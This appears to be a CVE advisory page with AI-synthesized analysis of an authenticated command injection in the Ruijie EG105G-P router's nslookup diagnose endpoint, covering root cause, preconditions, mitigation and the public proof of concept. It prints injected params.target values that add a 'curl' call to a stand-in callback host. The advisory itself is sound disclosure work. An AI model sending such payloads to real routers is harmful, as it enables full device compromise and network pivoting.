CVE-2026-12197
Description
Authenticated command injection in Ruijie EG105G-P diagnose endpoint allows remote attackers to execute arbitrary commands via crafted params.target.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Authenticated command injection in Ruijie EG105G-P diagnose endpoint allows remote attackers to execute arbitrary commands via crafted params.target.
Vulnerability
The Ruijie EG105G-P router running firmware ReyeeOS 2.340 (EG_3.0(1)B11P340) and earlier versions, such as ReyeeOS 1.202.2428 (EG_3.0(1)B11P202), contains an authenticated OS command injection vulnerability in the JSON-RPC diagnose endpoint. The vulnerable function is nslookup in the file /cgi-bin/luci/api/diagnose. The user-controlled parameter params.target is inserted into a shell command without proper sanitization or shell quoting. An attacker with a valid authenticated session ID can exploit this by supplying a newline character followed by arbitrary commands in the params.target value [1].
Exploitation
An attacker must first obtain a valid session ID (sid) for the diagnose API, which requires authentication as the admin user. The attacker then sends a POST request to /cgi-bin/luci/api/diagnose?auth= with a JSON payload specifying the nslookup method and a crafted params.target containing a newline and the desired command. For example, injecting \ncurl http://attacker/callback causes the shell to execute the additional command after the intended nslookup. The exploit has been publicly released and demonstrated against live devices [1].
Impact
Successful exploitation allows an attacker to execute arbitrary operating system commands on the device with the privileges of the web server (likely root). This can lead to full compromise of the router, including data exfiltration, installation of malware, or use as a pivot point for further attacks on the internal network. The impact is high due to the device's role as a network gateway [1].
Mitigation
The vendor was contacted but did not respond, and no official patch or firmware update has been released as of the publication date. Until a fix is available, administrators should restrict network access to the web management interface to trusted IPs only, use strong administrative passwords, and monitor for suspicious activity. Given the public exploit, organizations should consider the device at high risk and evaluate replacement if possible [1].
AI Insight generated on Jun 15, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- Range: =2.340
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The nslookup diagnostic method uses unquoted string interpolation (`"nslookup %s"`) to build a shell command, allowing a newline character in the user-controlled `params.target` parameter to terminate the intended command and execute an arbitrary second command."
Attack vector
An attacker who can reach the web management interface and obtain a valid authenticated session ID (sid) sends a POST request to `/cgi-bin/luci/api/diagnose?auth=<sid>` with a JSON body containing `"method": "nslookup"` and a `params.target` value that includes a newline character followed by an arbitrary shell command [ref_id=1]. The newline terminates the intended `nslookup` command line, and the shell executes the injected command. The researcher confirmed the attack by injecting `curl -s http://<callback-host>:18080/<marker>` and receiving an HTTP callback from the device [ref_id=1].
Affected code
The vulnerable endpoint is `/cgi-bin/luci/api/diagnose?auth=<sid>` in the Ruijie EG105G-P web management interface. The `nslookup` method of the JSON-RPC diagnose module inserts the user-controlled `params.target` value into a shell command using an unquoted `"nslookup %s"` format string, while the neighboring `ping` and `traceroute` helpers correctly use `%q` for shell quoting [ref_id=1].
What the fix does
No patch has been published by the vendor. The researcher recommends replacing the unsafe `"nslookup %s"` string interpolation with argument-vector execution APIs or, at minimum, using the `%q` shell-quoting format that is already employed by the adjacent `ping` and `traceroute` diagnostic helpers [ref_id=1]. Additional mitigations include strict allowlist validation of diagnostic targets, rejection of control characters such as `\r` and `\n`, and adding regression tests for shell metacharacters across all diagnose methods [ref_id=1].
Preconditions
- networkAttacker must have network access to the device's web management interface (HTTP/HTTPS).
- authAttacker must possess a valid authenticated session ID (sid) for the diagnose API, obtained through administrator login.
- configThe vulnerable endpoint /cgi-bin/luci/api/diagnose must be reachable and the nslookup method must be enabled.
Reproduction
The researcher provides a Python PoC script that authenticates as admin, starts a local HTTP callback listener, and sends a POST request to `/cgi-bin/luci/api/diagnose?auth=<sid>` with a JSON body containing `"method": "nslookup"` and `"params": {"target": "example.com\ncurl -s http://<callback-host>:18080/<marker>"}`. The callback listener receives an HTTP GET from the device IP, and the diagnose API response includes the callback listener's response body, confirming command execution [ref_id=1].
Generated on Jun 15, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
5News mentions
0No linked articles in our index yet.